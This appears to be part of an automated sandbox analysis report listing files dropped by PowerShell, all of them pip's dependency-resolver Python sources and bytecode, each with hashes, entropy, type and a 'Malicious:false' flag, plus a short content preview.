                                                                                                                                                                                                              SHA1:23ED6D47A0274A731FD31497A3EE0D9BD375DEB1
                                                                                                                                                                                                              SHA-256:E31446A9958A01EA71691DEAF35C95353FF71C4A8A836B9305580C7F34393B2C
                                                                                                                                                                                                              SHA-512:B54FC0D463EECDB8807605DF5CABE672A01C7EBD85019207BF3339964C0F66967A3387C2E2697CC7E3A22C4CD75064B66E6E8B9A5EDD171E2CD82BC3084ED636
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e5...............................d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.d.....e.e.....f.....Z.e.e.e.f.....Z.d.e.d.e.e.....d.e.f.d...Z...G.d...d.........Z...G.d...d.........Z.d.e.d.d.d.e.f.d...Z...G.d...d.........Z.y.)......)...FrozenSet..Iterable..Optional..Tuple..Union)...SpecifierSet)...NormalizedName)...LegacyVersion..Version)...Link..links_equivalent)...InstallRequirement)...Hashes..Candidate..project..extras..returnc.....................N.....|.s.|.S.d.j...................t.........|.................}.|...d.|...d...S.).N..,..[..])...join..sorted).r....r......extras_exprs.... .|C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/base.py..format_namer........s/.................(.(.6.&.>..*.K....Y.a...}.A..&..&.....c..........................e.Z.d.Z.d.e.d.e.d.e.e.....d.d.f.d...Z.e.d.d...........Z.e.d.e.d.d.f.d...........Z.d.e.f.d...Z.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30394
                                                                                                                                                                                                              Entropy (8bit):5.138660002417111
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:mhCRcR0v0wf4hOVqycZaMIF5++Ay8kMTB:m4R4hOAZYrFx8Ht
                                                                                                                                                                                                              MD5:BD49F8CF6770F5D1C462F9FFD3A386C6
                                                                                                                                                                                                              SHA1:9C3ED29BCD0622E4D76C0EDC53628C879E719292
                                                                                                                                                                                                              SHA-256:C282BB2DCF89F0C7EB2D6C7BB01DB560A508A9523E88E580951FD3A039A35A74
                                                                                                                                                                                                              SHA-512:11E49E2ADBC0A6EF678D506CC3822296703197948C4A706A5C66EDC471673231E061070CE4F632187B46A625CF562F6521E6E1BDCE0943A42F3748B163DA4B74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e<R..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&m'Z'm(Z(..e.r.d.d.l)m*Z*....e.jV..................e,........Z-e.d.....Z...e.e.d.........Z/d.e%d.e.e.....f.d...Z0d.e.d.e.d.e.f.d...Z1d.e.d.e.d.e.f.d...Z2d.e.d.e.d.e.f.d...Z3..G.d...d.e%........Z4..G.d...d.e4........Z5..G.d...d e4........Z6..G.d!..d"e%........Z7..G.d#..d$e%........Z8..G.d%..d&e%........Z9y.)'.....N)...TYPE_CHECKING..Any..FrozenSet..Iterable..Optional..Tuple..Union..cast)...NormalizedName..canonicalize_name)...Version)...HashError..InstallationSubprocessError..MetadataInconsistent)...BaseDistribution)...Link..links_equivalent)...Wheel)...install_req_from_editable..install_req_from_line)...InstallRequirement)...direct_url_from_link)...normalize_version_info.....)...Candidate..CandidateVersion..Requirement..format_name)...Fa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32118
                                                                                                                                                                                                              Entropy (8bit):5.4984755606127145
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:Wol8gJlDBsTzD4rv2PcGn5NkiA6S85mASI99DY:WSBD2EQ5Nki48KIk
                                                                                                                                                                                                              MD5:425ED36B617FEB0422FA19D6039175A6
                                                                                                                                                                                                              SHA1:5A05181055BCD22AC43E25DAC46C83311E601F26
                                                                                                                                                                                                              SHA-256:AE5CF08F346026C9BAE19ACC720288558B0DCB652266A815BC93057DBC5FE6E5
                                                                                                                                                                                                              SHA-512:51A1623A82AF322890A2A3C3C9B29DA04B5560273746AAC83DE81AFFE22D9810A712F71A06FF81F070CD5A33996DA6BCBF037DF280C187E1B65610E576782BAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e$~........................R.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>..d.d.l?m@Z@mAZAmBZBmCZC..d.d.lDmEZEmFZFmGZGmHZHmIZImJZJmKZK..d.d.lLmMZMmNZN..d.d.lOmPZPmQZQmRZRmSZSmTZT..e.r.d.d.l.mUZU....G.d...d.eU........ZV..e.j...................eX........ZY..e.d.........ZZe.e*eZf.....Z[..G.d...d.e.........Z\..G.d ..d!........Z]y.)".....N)...TYPE_CHECKING..Dict..FrozenSet..Iterable..Iterator..List..Mapping..NamedTuple..Optional..Sequence..Set..Tuple..TypeVar..cast)...InvalidRequirement)...SpecifierSet)...NormalizedName..canonicalize_name)...ResolutionImpossible)...CacheEntry..WheelCache)...DistributionNotFound..InstallationError..MetadataInconsistent..UnsupportedPythonVersion..Unsupporte
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6225
                                                                                                                                                                                                              Entropy (8bit):5.529746891857638
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:qzr4lqxqBYYHP9gUa1WM8Z+7vI32Xs3VkeezQkgSgjt+7L7NE987i7Mu7vh7kht8:DH3FoqyvI3lTRkLnNE9uMj9Gv9u
                                                                                                                                                                                                              MD5:68227ADFE3647F30104A45D0B625FFCE
                                                                                                                                                                                                              SHA1:66DEBAEE8FE32C32F047F226DAD66A371E683669
                                                                                                                                                                                                              SHA-256:9FAF2E98608CB9BF8D4151BDEC8D175F3ABC56E1B0C6F3580B465DDBA268DDE0
                                                                                                                                                                                                              SHA-512:C836F10F01EBCC426BFAB523558B45D45FADF90FE25775E0667F5C94F22BD08A3AF9A50D48CE284486617FF470C8722B8318C8BE63DBE10B13B9A02E4FBD4A36
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.eI...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.g.e.e.....f.....f.....Z.e.r.e.e.....Z.n.e.Z.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z...G.d...d.e.........Z.y.).a....Utilities to lazily create and visit candidates found...Creating and visiting a candidate is a *very* costly operation. It involves.fetching, extracting, potentially building modules from source, and verifying.distribution metadata. It is therefore crucial for performance to keep.everything here lazy all the way down, so we only touch candidates that we.absolutely need, and not "download the world" when we only need one version of.something.......N)...Sequence)...TYPE_CHECKING..Any..Callable..Iterator..Optional..Set..Tuple)..._BaseVersion.....)...Candidate..infos..returnc................#....|...K.....t.................}.|.D.])..\...}.}.|.|.v.r.....|.........}.|.....|.......|.j.............
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10395
                                                                                                                                                                                                              Entropy (8bit):5.642731439418211
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:FDUGNeHLqUx0E5TJ6yIXxOUyoZmQMW/U8zTdVAhs+RlLq6mPVB5W:FQk2Z/gXUoZdLTc4dS
                                                                                                                                                                                                              MD5:A9AF3AE804D92C240C4F227D3E6471E4
                                                                                                                                                                                                              SHA1:95988104D2EED21775E896A422681549BF935EFA
                                                                                                                                                                                                              SHA-256:12956FF2FB99F54B49819611B3C95FE91AC37AED0FBF24FB0B9875AC60C9D244
                                                                                                                                                                                                              SHA-512:052EF31790F99124BEF057E4311A12583BF9060B567D1042F48586776AFF1641B7F18C0DC7B95C53AC0D180ABBA9FDEFD788638F2809B096250D01E534C50505
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e`&..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...e.e.e.f.....Z.e.e.e.e.f.....Z.n.e.Z...e.d.........Z...e.d.........Z.d.e.e.e.f.....d.e.d.e.d.e.e.e.f.....f.d...Z...G.d...d.e.........Z.y.)......N)...TYPE_CHECKING..Dict..Iterable..Iterator..Mapping..Sequence..TypeVar..Union)...AbstractProvider.....)...Candidate..Constraint..Requirement)...REQUIRES_PYTHON_IDENTIFIER)...Factory)...Preference)...RequirementInformation..D..V..mapping..identifier..default..returnc.....................X.....|.|.v.r.|.|.....S.|.j...................d.........\...}.}.}.|.r.|.|.v.r.|.|.....S.|.S.).ai...Get item from a package name lookup mapping with a resolver identifier... This extra logic is needed when the target mapping is keyed by package. name, which cannot be directly looked up with an identifier (which may. contain requested extras). Additional logic is added to al
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4952
                                                                                                                                                                                                              Entropy (8bit):5.274423775642411
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:DZAc2bypey8Tl7eodtBzCLs2rhlnpqIkAzqzpybHQioc+Qc:zRePl6od+fsXgwioX
                                                                                                                                                                                                              MD5:0CA958948FFCBFAD9FE3F33CDDF3048E
                                                                                                                                                                                                              SHA1:EFF1AF1F6274CBADBDD274E671BD24CDE275B9A9
                                                                                                                                                                                                              SHA-256:0AD9305F4EB60DAA8CF8FE2FF235583E21158615EA0EA2ACAB5A71DC11244F33
                                                                                                                                                                                                              SHA-512:790661C861105E8BB35CD7F7448B5B832272A2D4C2658F9936CA52BF0279C16CCE04B845003824F3571FBD27D6AA28F07DA48C51651A5C1CD1A20AA9C50B5E01
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...defaultdict)...getLogger)...Any..DefaultDict)...BaseReporter.....)...Candidate..Requirementc.....................(.....e.Z.d.Z.d.d...Z.d.e.d.e.d.d.f.d...Z.y.)...PipReporter..returnNc.....................B.....t.........t.................|._.........d.d.d.d...|._.........y.).Nz.pip is looking at multiple versions of {package_name} to determine which version is compatible with other requirements. This could take a while.z.pip is still looking at multiple versions of {package_name} to determine which version is compatible with other requirements. This could take a while.z.This is taking longer than usual. You might need to provide the dependency resolver with stricter constraints to reduce runtime. See https://pip.pypa.io/warnings/backtracking for guidance. If you want to abort this run, press Ctrl + C.).r.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11430
                                                                                                                                                                                                              Entropy (8bit):4.860789443372166
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ezgdpKTx3IUkVkjMm79c69viXEm8NJdojSj6CcHp+OyRxwraWixLi9zuv/gbkVn6:eckD9tvONiToAdnwrgxWIqOVUmQ
                                                                                                                                                                                                              MD5:CEB651E96B389D6381A05612BE8A4F0C
                                                                                                                                                                                                              SHA1:1FE16C99C237BDCC62B540C462DA282272153923
                                                                                                                                                                                                              SHA-256:3D56F9C32DC69420613B34C6C03BE84BB1EF24F1CA25B60909C4A5BEB8D3EBAE
                                                                                                                                                                                                              SHA-512:9284D8C82F4B0F862F655928E1567058625B18B034C592A2CF3B594CFBFDEDB61B05F792B8B4FC920D76C893068010FE654B69AB13B0BAC79F4AB6831926BE70
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e@..............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...SpecifierSet)...NormalizedName..canonicalize_name)...install_req_drop_extras)...InstallRequirement.....)...Candidate..CandidateLookup..Requirement..format_namec..........................e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.y.)...ExplicitRequirement..candidate..returnNc...........................|.|._.........y...N..r........selfr....s.... ..C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/requirements.py..__init__z.ExplicitRequirement.__init__....s........".........c.....................,.....t.........|.j...........................S.r....)...strr......r....s.... r......__str__z.Explic
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12360
                                                                                                                                                                                                              Entropy (8bit):5.5360948522211535
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:yQdzXGFSCGhIQfIdUJ3MbYJbYclsYxGh314LCLpiEHCJU1Pf:rLwUIQwCYYxvlsYIx1BpiEHCJMPf
                                                                                                                                                                                                              MD5:3637951E508CA7ED6D0F04B604617826
                                                                                                                                                                                                              SHA1:383D553356A8B35DB8D81CE816A4678366C4E7C6
                                                                                                                                                                                                              SHA-256:A4EE59C5A93E839513C6C4772916495856D2A8F45DEE731BD9EFD46E620ED70B
                                                                                                                                                                                                              SHA-512:69B484AB60282F35D94E9B0D062D2672D2844623B7D24AC4F118FE813F9CF3F18A44F49B1AA45301B9A73A2DF713A16323CD1AC733782617BBE7BA4C7034FB42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e01..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..e.r.d.d.l0m1Z2..e2e-e,e3f.....Z1..e.jh..................e5........Z6..G.d...d.e"........Z.d.d.d.e.e3....d.e.e.e3....e7f.....f.d...Z8d.e.e3e.f.....d.e.e.e3....e7f.....d.e.e7e3f.....f.d...Z9y.)......N)...TYPE_CHECKING..Dict..List..Optional..Set..Tuple..cast....canonicalize_name)...BaseReporter..ResolutionImpossible)...Resolver)...DirectedGraph)...WheelCache)...PackageFinder)...RequirementPreparer)...install_req_extend_extras)...InstallRequirement)...RequirementSet)...BaseResolver..InstallRequirementProvider)...PipProvider)...PipDebuggingReporter..PipReporter)...get_requirement.....)...Candidate..Requirement)...Factory)...Resultc............................e.Z.d.Z.h.d...Z..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5173
                                                                                                                                                                                                              Entropy (8bit):4.645730040215515
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:GKgz+pKea9Gmpnhf5iSyYdTrVBgk29G7edvdssT6F4NgkQbpKDgkUq1us57IxCXO:OzWwGmpnhf5iSyYdTrVmcenjOu0+baqU
                                                                                                                                                                                                              MD5:0F2D852DECDCE2078DCA1F3144E0242E
                                                                                                                                                                                                              SHA1:15B46DD6A5E1D47D7D12E4F5C7FC7DCC10A468FC
                                                                                                                                                                                                              SHA-256:8E0E423A61CB86604828E47EE2CA5D243DE3C942D86B505DB2A881BB66099C9E
                                                                                                                                                                                                              SHA-512:757B7C156AAC53F65B29995FD00F1A0A4A7D22E5DA679667AEF1DDFF230ED830537A07B1799BCC103C8E1852183FCF611FB9292CFC9E7A32E4ED6B979A090926
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import FrozenSet, Iterable, Optional, Tuple, Union..from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName.from pip._vendor.packaging.version import LegacyVersion, Version..from pip._internal.models.link import Link, links_equivalent.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.hashes import Hashes..CandidateLookup = Tuple[Optional["Candidate"], Optional[InstallRequirement]].CandidateVersion = Union[LegacyVersion, Version]...def format_name(project: NormalizedName, extras: FrozenSet[NormalizedName]) -> str:. if not extras:. return project. extras_expr = ",".join(sorted(extras)). return f"{project}[{extras_expr}]"...class Constraint:. def __init__(. self, specifier: SpecifierSet, hashes: Hashes, links: FrozenSet[Link]. ) -> None:. self.specifier = specifier. self.hashes = hashes. self.links = links.. @classmethod. def empt
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21052
                                                                                                                                                                                                              Entropy (8bit):4.512854307945884
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:UVLfjKLbZ4P7blhTn7AT70VWPPIyBTrMM/cRVBZSPGt48G1LGQvdLsJBBMaz6DwB:Uw54Pnr7i70OVTkvN48yDdYV6wFNWWJf
                                                                                                                                                                                                              MD5:CD398AAF4525485F7972AB17AEE950C8
                                                                                                                                                                                                              SHA1:2BB311BBD7F8883F2F818863093863106280D462
                                                                                                                                                                                                              SHA-256:D7D2A2F753E8F8C4B10649C621F38691A5A415D3B39CDD16FE72AFEE32F6F0BD
                                                                                                                                                                                                              SHA-512:4E9731E8DB9AB343F7F228744C4F3F8975432EFAC8697F348C4EFDE92A2560E5152DD38C858FAC15DB430046E7ED6043EA5C7F3F2C9713C2A1A59A1CB6F4FEC9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import sys.from typing import TYPE_CHECKING, Any, FrozenSet, Iterable, Optional, Tuple, Union, cast..from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import (. HashError,. InstallationSubprocessError,. MetadataInconsistent,.).from pip._internal.metadata import BaseDistribution.from pip._internal.models.link import Link, links_equivalent.from pip._internal.models.wheel import Wheel.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.direct_url_helpers import direct_url_from_link.from pip._internal.utils.misc import normalize_version_info..from .base import Candidate, CandidateVersion, Requirement, format_name..if TYPE_CHECKING:. from .factory import Factory..logger = logging.getLogger(__name__)..BaseCandidate = Union[.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32292
                                                                                                                                                                                                              Entropy (8bit):4.255055335176978
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:68JR56HreGl3X0Cp7IiSCqaSbOJZHqtWSZ9pkqhYACZ1Y7X3vH24k:6H/p7I67KnLOGX3vH2
                                                                                                                                                                                                              MD5:3F53DA705335C523B60CE428CA6DF3D6
                                                                                                                                                                                                              SHA1:4F32A162518B6317878FAC1FB01B8647F715D940
                                                                                                                                                                                                              SHA-256:BEAAA4FA18DC85D85287059575E5B6FC0FB965B94B844FE70BFBF7321CF84AF7
                                                                                                                                                                                                              SHA-512:0E6E78F6F6A28FDF87DFA162A7E7919C8E17DAE539210E381B10139D4A582DA45BF10B6DBA00C0B0B8A4C287BCC395D71B1191B3FE217370CA685EF7B02BD4B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib.import functools.import logging.from typing import (. TYPE_CHECKING,. Dict,. FrozenSet,. Iterable,. Iterator,. List,. Mapping,. NamedTuple,. Optional,. Sequence,. Set,. Tuple,. TypeVar,. cast,.)..from pip._vendor.packaging.requirements import InvalidRequirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.resolvelib import ResolutionImpossible..from pip._internal.cache import CacheEntry, WheelCache.from pip._internal.exceptions import (. DistributionNotFound,. InstallationError,. MetadataInconsistent,. UnsupportedPythonVersion,. UnsupportedWheel,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_default_environment.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.operations.prepare im
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5705
                                                                                                                                                                                                              Entropy (8bit):4.505216978095506
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Ur4l0ct8kYS/bHXBRln6cYzjAfMuMcM8Z+79jAfLuMcXs3VkeezJrW4jAfrc3gwR:Bfz3yeTxcQ7ZQ7x
                                                                                                                                                                                                              MD5:D849F61FDD0534F82B95C28C80FBCC53
                                                                                                                                                                                                              SHA1:6E872AD864F5642639E2E2C625C0005269D472BD
                                                                                                                                                                                                              SHA-256:86F2F71E86BD55A628FAA10E664062D88AB0DB9D540F13F3FAE30755A5A62E91
                                                                                                                                                                                                              SHA-512:6FD6D88439B8E00BC0F1198B7F971EEC248EF5870016CB1ED1B52FDC376202E217D6B21E904A774ABEBFF481862A2ECE8FE087EDF7C55CB0D70AC48F997E1D0D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Utilities to lazily create and visit candidates found...Creating and visiting a candidate is a *very* costly operation. It involves.fetching, extracting, potentially building modules from source, and verifying.distribution metadata. It is therefore crucial for performance to keep.everything here lazy all the way down, so we only touch candidates that we.absolutely need, and not "download the world" when we only need one version of.something.."""..import functools.from collections.abc import Sequence.from typing import TYPE_CHECKING, Any, Callable, Iterator, Optional, Set, Tuple..from pip._vendor.packaging.version import _BaseVersion..from .base import Candidate..IndexCandidateInfo = Tuple[_BaseVersion, Callable[[], Optional[Candidate]]]..if TYPE_CHECKING:. SequenceCandidate = Sequence[Candidate].else:. # For compatibility: Python before 3.9 does not support using [] on the. # Sequence class.. #. # >>> from collections.abc import Sequence. # >>> Sequence[str]. #
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9824
                                                                                                                                                                                                              Entropy (8bit):4.433835668397495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vsVpuo0z0KlrlTlWD/7UrXQSgj6WyoZmQbEKzl6lCEPCACW:v2ujyD/7HSgmJoZFECZACW
                                                                                                                                                                                                              MD5:273EFD245287D4EC323A02EF05E983F7
                                                                                                                                                                                                              SHA1:76C0F41ACA7E9F66646B58EC015C160EF21E4A36
                                                                                                                                                                                                              SHA-256:E2DDB78AF8EBBAA33A84A057D4AA46893B7E3381C68517199C62D5D1CD352BB5
                                                                                                                                                                                                              SHA-512:E99EC829AF19E4E0B29B16C5B9B9F4856A9578EA6239AE07A328A59F09DA490E6E9B130D0BD704BD87F23B6883BC22B86EA63E722B9A6B324A7D9503A2106342
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import collections.import math.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. Iterator,. Mapping,. Sequence,. TypeVar,. Union,.)..from pip._vendor.resolvelib.providers import AbstractProvider..from .base import Candidate, Constraint, Requirement.from .candidates import REQUIRES_PYTHON_IDENTIFIER.from .factory import Factory..if TYPE_CHECKING:. from pip._vendor.resolvelib.providers import Preference. from pip._vendor.resolvelib.resolvers import RequirementInformation.. PreferenceInformation = RequirementInformation[Requirement, Candidate].. _ProviderBase = AbstractProvider[Requirement, Candidate, str].else:. _ProviderBase = AbstractProvider..# Notes on the relationship between the provider, the factory, and the.# candidate and requirement classes..#.# The provider is a direct implementation of the resolvelib class. Its role.# is to deliver the API that resolvelib expects..#.# Rather than work with completely abstract "requirement" and "can
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3100
                                                                                                                                                                                                              Entropy (8bit):4.472154934320961
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/PodCLtMjcwsHohgChCUG06SZh6HohRzorohcu:noIEb
                                                                                                                                                                                                              MD5:669B50941F26A76BD2F0110DA53829E4
                                                                                                                                                                                                              SHA1:E297B2B1FE62E181946180F25D71BEC8D7F2EF90
                                                                                                                                                                                                              SHA-256:6059BD850BF3E031426E365E153439EA14F3DC073E9830671E478D455BCC1CB6
                                                                                                                                                                                                              SHA-512:E0F46E49ABBC8E4BF295D2D7C2DCEDFD87588806E56B75EC111F2DDAAD0B237DA888A383B1004F771985F3C1AE9FA4B89072CE0A5D7341A7CA3F5B7254062D3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from collections import defaultdict.from logging import getLogger.from typing import Any, DefaultDict..from pip._vendor.resolvelib.reporters import BaseReporter..from .base import Candidate, Requirement..logger = getLogger(__name__)...class PipReporter(BaseReporter):. def __init__(self) -> None:. self.reject_count_by_package: DefaultDict[str, int] = defaultdict(int).. self._messages_at_reject_count = {. 1: (. "pip is looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 8: (. "pip is still looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 13: (. "This is taking longer than usual. You might need to provide ".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5696
                                                                                                                                                                                                              Entropy (8bit):4.5531229702159175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:k6ipKl5ohERsedlikilikBrbpKboohw6eabbpKpoh5S8pqRdvOlxwukbqm7hkL4j:AX0kkaYwe0MYjsnVW
                                                                                                                                                                                                              MD5:4E1972F212E51EF4A6C710CEF867B53D
                                                                                                                                                                                                              SHA1:2D0AE87422662F0C8DA9367FC8DFC8D3237A1913
                                                                                                                                                                                                              SHA-256:FA424E34FD168C37DD4EF040B36BD45CF8009CEC8D2011005D8E1BEF6A20B4F1
                                                                                                                                                                                                              SHA-512:6010B5B7226CE8478E8AA8AC2E0CAED3C543E72E2D2C689CA655EC4FF5469B59FF7C7614302B595DB2BA541A46A9519B4E1D7B9F41E4D02E953E14782360485D
                                                                                                                                                                                                              Malicious:false
